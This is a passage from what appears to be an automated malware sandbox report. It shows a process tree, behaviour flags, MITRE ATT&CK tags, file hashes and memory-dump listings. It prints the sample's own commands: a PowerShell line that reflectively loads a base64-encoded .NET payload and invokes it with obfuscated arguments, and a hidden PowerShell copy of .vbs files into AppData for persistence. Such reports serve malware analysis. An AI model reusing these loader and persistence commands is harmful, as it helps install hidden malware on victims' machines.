lAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAADA+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.zjn4*●*☞#:▶sr∞*▲◀(fom4*●*☞#:▶w∞*▲◀(n4*●*☞#:▶47.05.3](∞ú((úø(@@*ú.](∞ú(94*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝','1No1me_Startup','2'))
  2⤵
  - Blocklisted process makes network request
  - Drops startup file
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5096
- - C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Users\Admin\AppData\Roaming\d4f87072-7d06-4e8d-a6db-0a7854e5095e.vbs
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2856
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2788

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4bvuklda.aad.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2788-167-0x0000000005CD0000-0x0000000006274000-memory.dmp

Filesize
5.6MB

Download
memory/2788-166-0x0000000005620000-0x00000000056BC000-memory.dmp

Filesize
624KB

Download
memory/2788-172-0x0000000005780000-0x0000000005790000-memory.dmp

Filesize
64KB

Download
memory/2788-171-0x0000000005A70000-0x0000000005AD6000-memory.dmp

Filesize
408KB

Download
memory/2788-170-0x0000000005810000-0x000000000581A000-memory.dmp

Filesize
40KB

Download
memory/2788-160-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2788-169-0x0000000005780000-0x0000000005790000-memory.dmp

Filesize
64KB

Download
memory/2788-168-0x0000000005870000-0x0000000005902000-memory.dmp

Filesize
584KB

Download
memory/2856-158-0x00000263BE990000-0x00000263BE9A0000-memory.dmp

Filesize
64KB

Download
memory/2856-157-0x00000263BE990000-0x00000263BE9A0000-memory.dmp

Filesize
64KB

Download
memory/2856-156-0x00000263BE990000-0x00000263BE9A0000-memory.dmp

Filesize
64KB

Download
memory/5096-138-0x000001D671B40000-0x000001D671B62000-memory.dmp

Filesize
136KB

Download
memory/5096-143-0x000001D659630000-0x000001D659640000-memory.dmp

Filesize
64KB

Download
memory/5096-144-0x000001D659630000-0x000001D659640000-memory.dmp

Filesize
64KB

Download
memory/5096-145-0x000001D659630000-0x000001D659640000-memory.dmp

Filesize
64KB

Download